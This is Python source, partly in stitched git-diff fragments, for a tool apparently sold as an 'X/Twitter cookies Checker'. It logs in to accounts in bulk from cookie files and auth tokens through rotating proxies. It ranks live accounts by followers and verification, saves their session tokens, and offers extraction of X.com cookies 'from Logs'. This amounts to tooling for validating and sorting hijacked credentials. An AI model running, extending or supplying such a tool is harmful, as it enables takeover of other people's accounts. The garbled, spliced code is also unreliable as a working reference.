import asyncio
import random
from pathlib import Path
from typing import Optional, List, Union, Dict, Tuple
from tweety import TwitterAsync
from tweety.types import Proxy
from cookie_parser import read_cookies_file, clean_cookie_content
import debug_logger as log


async def authenticate_twitter(cookies: Union[str, Dict] = None, auth_token: str = None, proxy: Optional[Proxy] = None) -> TwitterAsync:
    """Create a TwitterAsync client and log it in via cookies or an auth token.

    *auth_token* takes precedence when both credentials are supplied.
    Any failure is logged with a traceback and re-raised to the caller.
    """
    log.debug(f"authenticate_twitter called - cookies: {bool(cookies)}, auth_token: {bool(auth_token)}, proxy: {bool(proxy)}")

    try:
        # Build the client, routing through the proxy when one is supplied.
        if not proxy:
            log.debug("Creating TwitterAsync without proxy")
            client = TwitterAsync("temp_session")
        else:
            log.debug(f"Creating TwitterAsync with proxy: {proxy.host}:{proxy.port}")
            client = TwitterAsync("temp_session", proxy=proxy)

        if auth_token:
            log.debug(f"Loading auth_token: {auth_token[:20]}...")
            await client.load_auth_token(auth_token)
        elif cookies:
            log.debug(f"Loading cookies (length: {len(str(cookies))})")
            log.debug(f"Cookies preview: {str(cookies)[:200]}...")
            await client.load_cookies(cookies)

        log.debug("Authentication object created successfully")
        return client
    except Exception as exc:
        log.error(f"Error in authenticate_twitter: {exc}")
        log.exception("Full traceback:")
        raise


async def check_account(cookie_file: Path, proxies: List[Proxy], output_dir: Path, semaphore: asyncio.Semaphore, cookies_only_mode: bool = False, user_data_list=None) -> Tuple[bool, bool, str]:
    """Validate one cookie file against X/Twitter and persist its account info.

    Returns a ``(success, verified, message)`` triple.
    """
    async with semaphore:
        log.info(f"=== Checking account: {cookie_file.name} ===")
        try:
            # --- read and normalise the cookie material ---------------------
            try:
                log.debug(f"Reading cookie file: {cookie_file}")
                cookie_header = read_cookies_file(str(cookie_file))
                if not cookie_header:
                    log.error(f"Failed to parse cookie file: {cookie_file.name}")
                    return (False, False, "Failed to parse cookie file")
                log.debug(f"Cookies parsed successfully, length: {len(cookie_header)}")

                cleaned_raw = clean_cookie_content(cookie_file.read_text(encoding='utf-8'))
                log.debug(f"Cleaned content length: {len(cleaned_raw)}")
            except Exception as exc:
                log.error(f"Failed to read cookies from {cookie_file.name}: {exc}")
                log.exception("Cookie read exception:")
                return (False, False, f"Failed to read cookies: {exc}")

            # --- pick a proxy, if any were supplied -------------------------
            if proxies:
                chosen_proxy = random.choice(proxies)
                log.debug(f"Using proxy: {chosen_proxy.host}:{chosen_proxy.port}")
            else:
                chosen_proxy = None
                log.debug("No proxy being used")

            # --- authenticate ----------------------------------------------
            try:
                log.debug("Attempting to authenticate...")
                client = await authenticate_twitter(cookies=cookie_header, proxy=chosen_proxy)
                log.debug("Authentication completed")
            except Exception as exc:
                log.error(f"Authentication error for {cookie_file.name}: {exc}")
                log.exception("Authentication exception:")
                return (False, False, f"Authentication error: {exc}")

            # --- inspect the logged-in user and persist the result ----------
            try:
                log.debug("Checking app.me...")
                me = client.me
                if me:
                    log.info(f"✓ Successfully authenticated as @{me.username}")
                    log.debug(f"User details - Followers: {me.followers_count}, Verified: {me.verified}")
                    badge = me.verified

                    try:
                        from file_utils import save_account_info
                        from main import config  # local import: avoids a circular import at module load
                        save_format = config.get('save_format', 'auth_token')
                        log.debug(f"Saving account info in {save_format} format")
                        save_account_info(me, cookie_file, output_dir, cleaned_raw, cookies_only_mode, save_format, user_data_list)
                        log.debug("Account info saved successfully")
                    except Exception as exc:
                        # Best effort: a failed save must not invalidate the check.
                        log.error(f"Failed to save account info: {exc}")
                        log.exception("Save exception:")

                    return (True, badge, f"@{me.username}")

                log.error(f"app.me is None for {cookie_file.name}")
                return (False, False, "Authentication failed - invalid cookies")
            except Exception as exc:
                log.error(f"Error processing user info for {cookie_file.name}: {exc}")
                log.exception("User info exception:")
                return (False, False, f"Error processing user info: {exc}")

        except Exception as exc:
            log.error(f"Unexpected error for {cookie_file.name}: {exc}")
            log.exception("Unexpected exception:")
            return (False, False, f"Unexpected error: {exc}")


async def check_account_by_token(auth_token: str, token_file: Path, token_line_num: int, proxies: List[Proxy], output_dir: Path, semaphore: asyncio.Semaphore, cookies_only_mode: bool = False, user_data_list=None) -> Tuple[bool, bool, str]:
    """Validate a single auth token and persist its account info.

    Returns a ``(success, verified, message)`` triple.
    """
    async with semaphore:
        try:
            source_tag = f"{token_file.name}:line-{token_line_num}"
            picked_proxy = random.choice(proxies) if proxies else None

            try:
                client = await authenticate_twitter(auth_token=auth_token, proxy=picked_proxy)
            except Exception as exc:
                return (False, False, f"Authentication error: {exc}")

            try:
                me = client.me
                if not me:
                    return (False, False, "Authentication failed - invalid token")

                badge = me.verified
                try:
                    from file_utils import save_account_info_token
                    from main import config  # local import: avoids a circular import at module load
                    save_format = config.get('save_format', 'auth_token')
                    save_account_info_token(me, auth_token, source_tag, output_dir, cookies_only_mode, save_format, user_data_list)
                except Exception:
                    # Best effort: saving is optional for the check result.
                    pass

                return (True, badge, f"@{me.username}")
            except Exception as exc:
                return (False, False, f"Error processing user info: {exc}")

        except Exception as exc:
            return (False, False, f"Unexpected error: {exc}")
from pathlib import Path
from typing import List, Tuple


def scan_auth_tokens_directory(dir_path: str) -> List[Path]:
    """Resolve *dir_path* to a sorted list of ``.txt`` token files.

    Accepts either a single file or a directory; a path that does not exist
    is retried relative to the current working directory.

    Raises:
        FileNotFoundError: if neither candidate path exists.
    """
    path = Path(dir_path).expanduser().resolve()

    if not path.exists():
        # Fall back to interpreting the argument relative to the CWD.
        path = Path.cwd() / dir_path
        if not path.exists():
            raise FileNotFoundError(f"Path not found: {dir_path}")

    if path.is_file():
        return [path]

    return sorted(path.glob('*.txt'))


def read_auth_tokens_from_file(file_path: Path) -> List[Tuple[int, str]]:
    """Return ``(line_number, token)`` pairs for every non-blank line.

    Line numbers refer to the actual file lines.  (The previous version
    stripped the whole file before splitting, which skewed the reported
    line numbers whenever the file started with blank lines.)

    Best-effort: unreadable or undecodable files yield an empty list so
    one bad file cannot abort a batch run.
    """
    try:
        content = file_path.read_text(encoding='utf-8')
    except (OSError, UnicodeError):
        # Narrowed from a bare `except Exception`: only I/O and decoding
        # problems are expected here; anything else is a genuine bug and
        # should propagate.
        return []

    tokens = []
    for line_num, line in enumerate(content.splitlines(), start=1):
        token = line.strip()  # also removes stray '\r' from CRLF files
        if token:
            tokens.append((line_num, token))
    return tokens
def netscape_to_dict(netscape_content: str) -> Dict[str, str]:
    """Map cookie names to values from Netscape cookie-jar text."""
    result = {}
    for raw in netscape_content.strip().split('\n'):
        # Skip comments and blank lines; require all seven tab fields.
        if not raw.strip() or raw.startswith('#'):
            continue
        fields = raw.split('\t')
        if len(fields) < 7:
            continue
        result[fields[5]] = fields[6]
    return result


def json_to_dict(json_content: str) -> Dict[str, str]:
    """Extract a name→value cookie mapping from JSON cookie data.

    Accepts either a list of cookie objects or a plain mapping.
    """
    data = json.loads(json_content)

    if isinstance(data, dict):
        return data

    result = {}
    if isinstance(data, list):
        for entry in data:
            if 'name' in entry and 'value' in entry:
                result[entry['name']] = entry['value']
    return result


def dict_to_cookie_string(cookies: Dict[str, str]) -> str:
    """Render cookies as a single ``name=value; name=value`` header string."""
    return "; ".join(f"{name}={value}" for name, value in cookies.items())


def read_cookies_file(file_path: str) -> str:
    """Load a cookie file (JSON or Netscape) as a ``name=value; ...`` string.

    Returns None when the file is missing, unreadable, or yields no cookies.
    """
    log.debug(f"read_cookies_file called for: {file_path}")
    source = Path(file_path)
    if not source.exists():
        log.error(f"Cookie file does not exist: {file_path}")
        return None

    try:
        raw = source.read_text(encoding='utf-8')
    except Exception as exc:
        log.error(f"Failed to read file {file_path}: {exc}")
        return None
    log.debug(f"File content read, length: {len(raw)}")
    log.debug(f"First 200 chars: {raw[:200]}")

    cleaned = clean_cookie_content(raw)
    log.debug(f"After cleaning, content length: {len(cleaned) if cleaned else 0}")
    if not cleaned:
        log.error(f"Content is empty after cleaning for {file_path}")
        return None

    # Try JSON first, then fall back to Netscape tab-separated format.
    try:
        log.debug("Attempting to parse as JSON...")
        parsed = json_to_dict(cleaned)
        log.debug(f"Parsed as JSON, {len(parsed)} cookies found")
    except json.JSONDecodeError as exc:
        log.debug(f"Not JSON format: {exc}, trying Netscape format...")
        try:
            parsed = netscape_to_dict(cleaned)
            log.debug(f"Parsed as Netscape, {len(parsed)} cookies found")
        except Exception as exc:
            log.error(f"Failed to parse as Netscape: {exc}")
            return None

    if not parsed:
        log.error(f"No cookies found in dictionary for {file_path}")
        return None

    log.debug(f"Cookie names found: {list(parsed.keys())}")
    header = dict_to_cookie_string(parsed)
    log.debug(f"Final cookie string length: {len(header)}")
    return header
'\033[1;35m[DEBUG]\033[0m %(message)s' +) +console_handler.setFormatter(console_formatter) + +# Add handlers +logger.addHandler(file_handler) +logger.addHandler(console_handler) + +def debug(msg): + """Log debug message""" + logger.debug(msg) + +def info(msg): + """Log info message""" + logger.info(msg) + +def warning(msg): + """Log warning message""" + logger.warning(msg) + +def error(msg): + """Log error message""" + logger.error(msg) + +def exception(msg): + """Log exception with traceback""" + logger.exception(msg) + +# Print initial message +info(f"Debug logging initialized. Log file: {log_file}") diff --git a/file_utils.py b/file_utils.py new file mode 100644 index 0000000..1b5dc04 --- /dev/null +++ b/file_utils.py @@ -0,0 +1,262 @@ +from pathlib import Path +from datetime import datetime + + +def save_in_format(user, content: str, content_type: str, output_dir: Path, save_format: str): + from format_converter import cookies_dict_to_netscape, cookies_dict_to_json, extract_auth_token_from_cookies, parse_cookie_string + + output_dir.mkdir(exist_ok=True) + + username = user.username + verified_status = "verified" if user.verified else "unverified" + followers = user.followers_count + posts = user.statuses_count + + filename = f"{verified_status} - {followers} followers - {posts} posts - @{username}.txt" + info_file = output_dir / filename + + if save_format == 'auth_token': + if content_type == 'cookies': + cookies_dict = parse_cookie_string(content) + auth_token = extract_auth_token_from_cookies(cookies_dict) + info_file.write_text(auth_token, encoding='utf-8') + else: + info_file.write_text(content, encoding='utf-8') + elif save_format == 'netscape': + if content_type == 'cookies': + cookies_dict = parse_cookie_string(content) + netscape_content = cookies_dict_to_netscape(cookies_dict) + info_file.write_text(netscape_content, encoding='utf-8') + else: + info_file.write_text(content, encoding='utf-8') + elif save_format == 'json': + if content_type == 
'cookies': + cookies_dict = parse_cookie_string(content) + json_content = cookies_dict_to_json(cookies_dict) + info_file.write_text(json_content, encoding='utf-8') + else: + info_file.write_text(content, encoding='utf-8') + + return info_file + + +def scan_cookies_directory(dir_path: str): + path = Path(dir_path).expanduser().resolve() + + if not path.exists(): + path = Path.cwd() / dir_path + if not path.exists(): + raise FileNotFoundError(f"Path not found: {dir_path}") + + if path.is_file(): + return [path] + + cookie_files = [] + for ext in ['*.json', '*.txt']: + cookie_files.extend(path.glob(ext)) + + return sorted(cookie_files) + + +def save_account_info(user, cookie_file: Path, output_dir: Path, cleaned_cookies: str = None, cookies_only_mode: bool = False, save_format: str = 'auth_token', user_data_list=None): + if user_data_list is not None: + user_data_list.append({ + 'user': user, + 'cookie_file': cookie_file, + 'cleaned_cookies': cleaned_cookies, + 'content_type': 'cookies' + }) + + if cookies_only_mode: + return save_in_format(user, cleaned_cookies or cookie_file.read_text(encoding='utf-8'), 'cookies', output_dir, save_format) + + output_dir.mkdir(exist_ok=True) + + username = user.username + verified_status = "verified" if user.verified else "unverified" + followers = user.followers_count + posts = user.statuses_count + + filename = f"{verified_status} - {followers} followers - {posts} posts - @{username}.txt" + info_file = output_dir / filename + + if cleaned_cookies: + cookie_content = cleaned_cookies + else: + cookie_content = cookie_file.read_text(encoding='utf-8') + + verified_type = None + verified_label = None + + if isinstance(user, dict): + verified_type = user.get('verified_type') or user.get('ext_verified_type') + verified_label = user.get('verified_label') + + if 'legacy' in user and isinstance(user['legacy'], dict): + if not verified_type: + verified_type = user['legacy'].get('verified_type') + + if 'ext_is_blue_verified' in user: + if 
user['ext_is_blue_verified']: + verified_type = verified_type or 'Blue' + + from format_converter import parse_cookie_string, extract_auth_token_from_cookies, cookies_dict_to_netscape, cookies_dict_to_json + + if save_format == 'auth_token': + from cookie_parser import read_cookies_file + cookies_string = read_cookies_file(str(cookie_file)) + if cookies_string: + cookies_dict = parse_cookie_string(cookies_string) + auth_token = extract_auth_token_from_cookies(cookies_dict) + if auth_token: + cookie_content = auth_token + else: + cookie_content = cleaned_cookies or cookie_file.read_text(encoding='utf-8') + else: + cookie_content = cleaned_cookies or cookie_file.read_text(encoding='utf-8') + elif save_format == 'netscape': + from cookie_parser import read_cookies_file + cookies_string = read_cookies_file(str(cookie_file)) + if cookies_string: + cookies_dict = parse_cookie_string(cookies_string) + cookie_content = cookies_dict_to_netscape(cookies_dict) + else: + cookie_content = cleaned_cookies or cookie_file.read_text(encoding='utf-8') + elif save_format == 'json': + from cookie_parser import read_cookies_file + cookies_string = read_cookies_file(str(cookie_file)) + if cookies_string: + cookies_dict = parse_cookie_string(cookies_string) + cookie_content = cookies_dict_to_json(cookies_dict) + else: + cookie_content = cleaned_cookies or cookie_file.read_text(encoding='utf-8') + else: + cookie_content = cleaned_cookies or cookie_file.read_text(encoding='utf-8') + + verification_parts = [] + if user.verified: + verification_parts.append("Verified: Yes") + if verified_type: + verification_parts.append(f"Type: {verified_type}") + if verified_label: + verification_parts.append(f"Label: {verified_label}") + else: + verification_parts.append("Verified: No") + + verification_line = " | ".join(verification_parts) + + try: + if isinstance(user.created_at, str): + from dateutil import parser + created_date = parser.parse(user.created_at) + created_str = 
created_date.strftime("%d.%m.%Y %H:%M") + else: + created_str = user.created_at.strftime("%d.%m.%Y %H:%M") + except: + created_str = str(user.created_at) + + cookie_content = cookie_content.replace('.twitter.com', '.x.com').replace('twitter.com', 'x.com') + + info_lines = [ + "=" * 80, + f"Checked: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}", + "", + f"ID: {user.id} | Name: {user.name} | Username: @{username}", + f"Followers: {user.followers_count:,} | Following: {user.friends_count:,}", + f"Tweets: {user.statuses_count:,} | Likes: {user.favourites_count:,}", + verification_line, + f"Created: {created_str}", + f"Profile: https://x.com/{username}", + "", + f"Cookie file: {cookie_file.absolute()}", + "", + "=" * 80, + cookie_content, + ] + + info_file.write_text('\n'.join(info_lines), encoding='utf-8') + return info_file + + +def save_account_info_token(user, auth_token: str, token_source: str, output_dir: Path, cookies_only_mode: bool = False, save_format: str = 'auth_token', user_data_list=None): + if user_data_list is not None: + user_data_list.append({ + 'user': user, + 'auth_token': auth_token, + 'token_source': token_source, + 'content_type': 'token' + }) + + if cookies_only_mode: + return save_in_format(user, auth_token, 'token', output_dir, save_format) + + output_dir.mkdir(exist_ok=True) + + username = user.username + verified_status = "verified" if user.verified else "unverified" + followers = user.followers_count + posts = user.statuses_count + + filename = f"{verified_status} - {followers} followers - {posts} posts - @{username}.txt" + info_file = output_dir / filename + + if cookies_only_mode: + info_file.write_text(auth_token, encoding='utf-8') + return info_file + + verified_type = None + verified_label = None + + if isinstance(user, dict): + verified_type = user.get('verified_type') or user.get('ext_verified_type') + verified_label = user.get('verified_label') + + if 'legacy' in user and isinstance(user['legacy'], dict): + if not verified_type: + 
#!/usr/bin/env python3

import json
import sys
from pathlib import Path


def fix_malformed_cookie_file(file_path):
    """Repair cookie files where Netscape text was embedded in a JSON wrapper.

    Some exporters produce a JSON list whose first element's ``name`` field
    actually contains tab-separated Netscape cookie lines (with the rest in
    ``value``).  This rewrites such files in place as a proper JSON list.

    Returns:
        bool: True if the file was rewritten, False otherwise.
    """
    try:
        with open(file_path, 'r', encoding='utf-8') as f:
            content = f.read()

        try:
            data = json.loads(content)
        except json.JSONDecodeError:
            # Narrowed from a bare `except:` which also swallowed
            # KeyboardInterrupt/SystemExit.
            print(f"Skipping {file_path.name} - not valid JSON")
            return False

        if not (isinstance(data, list) and data):
            return False

        first_item = data[0]
        # Guard against non-dict list entries before keyed access (a list of
        # strings would otherwise raise and be mis-reported as an error).
        if not isinstance(first_item, dict):
            return False
        if 'name' not in first_item or '\t' not in str(first_item['name']):
            return False

        # Malformed: recombine the Netscape lines split across name/value.
        netscape_content = first_item['name'] + '\n' + first_item.get('value', '')

        cookies = []
        for line in netscape_content.split('\n'):
            line = line.strip()
            if not line or line.startswith('#'):
                continue
            parts = line.split('\t')
            if len(parts) >= 7:
                cookies.append({
                    "domain": parts[0],
                    "flag": parts[1] == "TRUE",
                    "path": parts[2],
                    "secure": parts[3] == "TRUE",
                    "expiration": int(parts[4]) if parts[4].isdigit() else 0,
                    "name": parts[5],
                    "value": parts[6],
                })

        if not cookies:
            return False

        # Save the repaired JSON in place.
        with open(file_path, 'w', encoding='utf-8') as f:
            json.dump(cookies, f, indent=2)
        return True

    except Exception as e:
        print(f"Error processing {file_path.name}: {e}")
        return False


def main():
    """Scan a directory (argv[1] or the CWD) and fix malformed cookie files."""
    target_dir = Path(sys.argv[1]) if len(sys.argv) > 1 else Path.cwd()

    if not target_dir.exists():
        print(f"Directory not found: {target_dir}")
        return

    print(f"Scanning directory: {target_dir}")
    print()

    cookie_files = list(target_dir.glob("*.txt")) + list(target_dir.glob("*.json"))

    if not cookie_files:
        print("No cookie files found (.txt or .json)")
        return

    print(f"Found {len(cookie_files)} file(s)")
    print()

    fixed_count = 0
    for cookie_file in cookie_files:
        if fix_malformed_cookie_file(cookie_file):
            print(f"✓ Fixed: {cookie_file.name}")
            fixed_count += 1

    print()
    print("=" * 70)
    print(f"Total files scanned: {len(cookie_files)}")
    print(f"Files fixed: {fixed_count}")
    print("=" * 70)


if __name__ == "__main__":
    main()
"__main__": + main() diff --git a/format_converter.py b/format_converter.py new file mode 100644 index 0000000..2e4ead7 --- /dev/null +++ b/format_converter.py @@ -0,0 +1,53 @@ +import json +from pathlib import Path +from typing import Dict + + +def cookies_dict_to_netscape(cookies: Dict[str, str], domain: str = ".x.com") -> str: + netscape_lines = [] + + for name, value in cookies.items(): + path = "/" + secure = "TRUE" + http_only = "FALSE" + expiry = "1735689600" + + line = f"{domain}\tTRUE\t{path}\t{secure}\t{expiry}\t{name}\t{value}" + netscape_lines.append(line) + + return '\n'.join(netscape_lines) + + +def cookies_dict_to_json(cookies: Dict[str, str], domain: str = ".x.com") -> str: + json_cookies = [] + + for name, value in cookies.items(): + cookie_obj = { + "domain": domain, + "expirationDate": 1735689600, + "hostOnly": False, + "httpOnly": False, + "name": name, + "path": "/", + "sameSite": "no_restriction", + "secure": True, + "session": False, + "storeId": None, + "value": value + } + json_cookies.append(cookie_obj) + + return json.dumps(json_cookies, indent=2) + + +def extract_auth_token_from_cookies(cookies: Dict[str, str]) -> str: + return cookies.get('auth_token', '') + + +def parse_cookie_string(cookie_string: str) -> Dict[str, str]: + cookies = {} + for pair in cookie_string.split('; '): + if '=' in pair: + name, value = pair.split('=', 1) + cookies[name] = value + return cookies diff --git a/main.py b/main.py new file mode 100644 index 0000000..1cc5d3a --- /dev/null +++ b/main.py @@ -0,0 +1,1081 @@ +#!/usr/bin/env python3 + +import sys +import asyncio +import json +from pathlib import Path +from datetime import datetime +from file_utils import scan_cookies_directory, save_account_info_token +from proxy_handler import read_proxy_file +from account_checker import check_account, check_account_by_token +from auth_token_handler import scan_auth_tokens_directory, read_auth_tokens_from_file +import debug_logger as log + + +CONFIG_FILE = 
Path("config.json") + +def load_config(): + default_config = { + 'cookies_dir': 'cookies', + 'output_dir': 'results', + 'cookies_only_mode': False, + 'threads': 1, + 'use_proxy': True, + 'auth_mode': 'cookies', + 'save_format': 'auth_token', + 'filter_enabled': False, + 'filter_min_followers': 0, + 'filter_max_followers': 0, + 'filter_min_posts': 0, + 'filter_min_likes': 0, + 'filter_verified_only': False, + 'filtered_output_dir': 'filtered' + } + + if CONFIG_FILE.exists(): + try: + with open(CONFIG_FILE, 'r') as f: + loaded = json.load(f) + default_config.update(loaded) + except: + pass + + return default_config + +def save_config(cfg): + try: + with open(CONFIG_FILE, 'w') as f: + json.dump(cfg, f, indent=2) + except: + pass + +config = load_config() + + +def print_banner(): + print("\033[2J\033[H", end='') + print("\033[1;36m" + "=" * 70) + print("██╗ ██╗ ██████╗██╗ ██╗███████╗ ██████╗██╗ ██╗███████╗██████╗ ") + print("╚██╗██╔╝ ██╔════╝██║ ██║██╔════╝██╔════╝██║ ██╔╝██╔════╝██╔══██╗") + print(" ╚███╔╝ ██║ ███████║█████╗ ██║ █████╔╝ █████╗ ██████╔╝") + print(" ██╔██╗ ██║ ██╔══██║██╔══╝ ██║ ██╔═██╗ ██╔══╝ ██╔══██╗") + print("██╔╝ ██╗ ╚██████╗██║ ██║███████╗╚██████╗██║ ██╗███████╗██║ ██║") + print("╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝") + print("=" * 70) + print("\033[1;33m X/Twitter cookies Checker") + print("\033[1;35m Contact: @CrystalStud for support/buy") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print() + + +def print_menu(): + print("\n\033[1;32m┌─────────────────────────────────────┐") + print("│ MAIN MENU │") + print("└─────────────────────────────────────┘\033[0m\n") + print("\033[1;37m[1]\033[0m Check Accounts") + print("\033[1;37m[2]\033[0m Filter Accounts") + print("\033[1;37m[3]\033[0m Extract Auth Tokens") + print("\033[1;37m[4]\033[0m Convert Cookie Format") + print("\033[1;37m[5]\033[0m Extract X.com Cookies from Logs") + print("\033[1;37m[6]\033[0m Settings") + print("\033[1;37m[7]\033[0m About") + 
print("\033[1;37m[0]\033[0m Exit") + print() + + +def get_input(prompt, default=None): + if default: + user_input = input(f"\033[1;33m{prompt}\033[0m [\033[1;36m{default}\033[0m]: ").strip() + return user_input if user_input else default + else: + return input(f"\033[1;33m{prompt}\033[0m: ").strip() + + +def print_success(msg): + print(f"\033[1;32m✓\033[0m {msg}") + + +def print_error(msg): + print(f"\033[1;31m✗\033[0m {msg}") + + +def print_info(msg): + print(f"\033[1;34mℹ\033[0m {msg}") + + +async def process_batch(batch, proxies, output_dir, semaphore, cookies_only_mode, results, user_data_list=None): + tasks = [] + for cookie_file in batch: + task = check_account(cookie_file, proxies, output_dir, semaphore, cookies_only_mode, user_data_list) + tasks.append(task) + + batch_results = await asyncio.gather(*tasks) + for success, verified, msg in batch_results: + results.append((success, verified)) + + +async def process_batch_tokens(batch, proxies, output_dir, semaphore, cookies_only_mode, results, user_data_list=None): + tasks = [] + for token_file, token_line_num, auth_token in batch: + task = check_account_by_token(auth_token, token_file, token_line_num, proxies, output_dir, semaphore, cookies_only_mode, user_data_list) + tasks.append(task) + + batch_results = await asyncio.gather(*tasks) + for success, verified, msg in batch_results: + results.append((success, verified)) + + +async def run_checker(cookies_path, proxy_file=None): + log.info("=" * 80) + log.info("Starting checker run") + log.info(f"Cookies path: {cookies_path}") + log.info(f"Proxy file: {proxy_file}") + log.info(f"Config: {config}") + log.info("=" * 80) + + start_time = datetime.now() + output_dir = Path(config['output_dir']) + output_dir.mkdir(exist_ok=True) + + try: + print_info(f"Scanning for cookies in: {cookies_path}") + log.debug(f"Scanning directory: {cookies_path}") + cookie_files = scan_cookies_directory(cookies_path) + log.info(f"Found {len(cookie_files) if cookie_files else 0} cookie 
files") + + if not cookie_files: + print_error("No cookie files found (.json or .txt)") + return + + print_success(f"Found {len(cookie_files)} cookie file(s)") + + proxies = [] + if proxy_file: + print_info(f"Loading proxies from: {proxy_file}") + try: + proxies = read_proxy_file(proxy_file) + if not proxies: + print_error("No valid proxies found, continuing without proxy") + except: + print_error("Failed to load proxies, continuing without proxy") + + print() + print("\033[1;36m" + "=" * 70 + "\033[0m") + print("\033[1;37m CHECKING ACCOUNTS\033[0m") + print(f"\033[1;35m Threads: {config['threads']}\033[0m") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print() + + num_threads = config['threads'] + concurrent_per_thread = 5 + batch_size = len(cookie_files) // num_threads + batches = [] + + for i in range(num_threads): + start_idx = i * batch_size + if i == num_threads - 1: + end_idx = len(cookie_files) + else: + end_idx = (i + 1) * batch_size + batches.append(cookie_files[start_idx:end_idx]) + + semaphore = asyncio.Semaphore(concurrent_per_thread) + results = [] + user_data_list = [] + + check_start_time = datetime.now() + total_checked = 0 + + async def monitor_progress(): + nonlocal total_checked + while total_checked < len(cookie_files): + await asyncio.sleep(0.3) + checked = len(results) + if checked != total_checked: + total_checked = checked + successful = sum(1 for s, v in results if s) + failed = sum(1 for s, v in results if not s) + verified_count = sum(1 for s, v in results if s and v) + remaining = len(cookie_files) - total_checked + + if total_checked > 0 and remaining > 0: + elapsed = (datetime.now() - check_start_time).total_seconds() + avg_time = elapsed / total_checked + eta_seconds = avg_time * remaining + eta_str = f"{int(eta_seconds // 60)}m {int(eta_seconds % 60)}s" + else: + eta_str = "calculating..." 
+ + progress_bar = "█" * (total_checked * 40 // len(cookie_files)) + "░" * (40 - total_checked * 40 // len(cookie_files)) + print(f"\r\033[1;36m[{progress_bar}]\033[0m {total_checked}/{len(cookie_files)} | \033[1;32m✓{successful}\033[0m | \033[1;31m✗{failed}\033[0m | \033[1;33m★{verified_count}\033[0m | ETA: {eta_str} ", end='', flush=True) + + monitor_task = asyncio.create_task(monitor_progress()) + + batch_tasks = [] + for batch in batches: + task = process_batch(batch, proxies, output_dir, semaphore, config['cookies_only_mode'], results, user_data_list) + batch_tasks.append(task) + + await asyncio.gather(*batch_tasks) + await monitor_task + + successful = sum(1 for s, v in results if s) + failed = sum(1 for s, v in results if not s) + verified_count = sum(1 for s, v in results if s and v) + + print() + print() + + end_time = datetime.now() + elapsed_time = end_time - start_time + elapsed_seconds = elapsed_time.total_seconds() + + print("\033[1;36m" + "=" * 70 + "\033[0m") + print("\033[1;37m SUMMARY\033[0m") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print(f"\033[1;37mTotal accounts:\033[0m {len(cookie_files)}") + print(f"\033[1;32m✓ Successful:\033[0m {successful}") + print(f"\033[1;31m✗ Failed:\033[0m {failed}") + print(f"\033[1;33m★ Verified:\033[0m {verified_count}") + print(f"\033[1;35m⏱ Time elapsed:\033[0m {elapsed_seconds:.2f}s") + print(f"\033[1;34m📁 Results saved to:\033[0m {output_dir.absolute()}/") + print("\033[1;36m" + "=" * 70 + "\033[0m") + + summary_file = output_dir / f"summary_{datetime.now().strftime('%Y%m%d_%H%M%S')}.txt" + summary_lines = [ + "=" * 80, + "X Checker, contact @CrystalStud for support", + "=" * 80, + f"Date: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}", + "", + "Results:", + f" Total accounts checked: {len(cookie_files)}", + f" Valid accounts: {successful}", + f" Invalid accounts: {failed}", + f" Verified accounts: {verified_count}", + "", + "Performance:", + f" Time elapsed: {elapsed_seconds:.2f}s", + f" Average per 
account: {elapsed_seconds/len(cookie_files):.2f}s", + "", + "Configuration:", + f" Proxies loaded: {len(proxies) if proxies else 0}", + f" Cookie files: {len(cookie_files)}", + "", + "=" * 80, + ] + summary_file.write_text('\n'.join(summary_lines), encoding='utf-8') + print_success(f"Summary saved to: {summary_file.name}") + + try: + session_file = Path("temp_session.tw_session") + if session_file.exists(): + session_file.unlink() + except: + pass + + except FileNotFoundError as e: + print_error(f"Error: {e}") + except Exception as e: + print_error(f"Unexpected error: {e}") + + +async def run_checker_tokens(tokens_path, proxy_file=None): + start_time = datetime.now() + output_dir = Path(config['output_dir']) + output_dir.mkdir(exist_ok=True) + + try: + print_info(f"Scanning for auth tokens in: {tokens_path}") + token_files = scan_auth_tokens_directory(tokens_path) + + if not token_files: + print_error("No token files found (.txt)") + return + + print_success(f"Found {len(token_files)} token file(s)") + + all_tokens = [] + for token_file in token_files: + tokens = read_auth_tokens_from_file(token_file) + for line_num, token in tokens: + all_tokens.append((token_file, line_num, token)) + + if not all_tokens: + print_error("No valid auth tokens found in files") + return + + print_success(f"Found {len(all_tokens)} auth token(s)") + + proxies = [] + if proxy_file: + print_info(f"Loading proxies from: {proxy_file}") + try: + proxies = read_proxy_file(proxy_file) + if not proxies: + print_error("No valid proxies found, continuing without proxy") + except: + print_error("Failed to load proxies, continuing without proxy") + + print() + print("\033[1;36m" + "=" * 70 + "\033[0m") + print("\033[1;37m CHECKING ACCOUNTS (AUTH TOKEN MODE)\033[0m") + print(f"\033[1;35m Threads: {config['threads']}\033[0m") + print("\033[1;36m" + "=" * 70 + "\033[0m") + print() + + num_threads = config['threads'] + concurrent_per_thread = 5 + batch_size = len(all_tokens) // num_threads + batches = 
[] + + for i in range(num_threads): + start_idx = i * batch_size + if i == num_threads - 1: + end_idx = len(all_tokens) + else: + end_idx = (i + 1) * batch_size + batches.append(all_tokens[start_idx:end_idx]) + + semaphore = asyncio.Semaphore(concurrent_per_thread) + results = [] + user_data_list = [] + + check_start_time = datetime.now() + total_checked = 0 + + async def monitor_progress(): + nonlocal total_checked + while total_checked < len(all_tokens): + await asyncio.sleep(0.3) + checked = len(results) + if checked != total_checked: + total_checked = checked + successful = sum(1 for s, v in results if s) + failed = sum(1 for s, v in results if not s) + verified_count = sum(1 for s, v in results if s and v) + remaining = len(all_tokens) - total_checked + + if total_checked > 0 and remaining > 0: + elapsed = (datetime.now() - check_start_time).total_seconds() + avg_time = elapsed / total_checked + eta_seconds = avg_time * remaining + eta_str = f"{int(eta_seconds // 60)}m {int(eta_seconds % 60)}s" + else: + eta_str = "calculating..." 
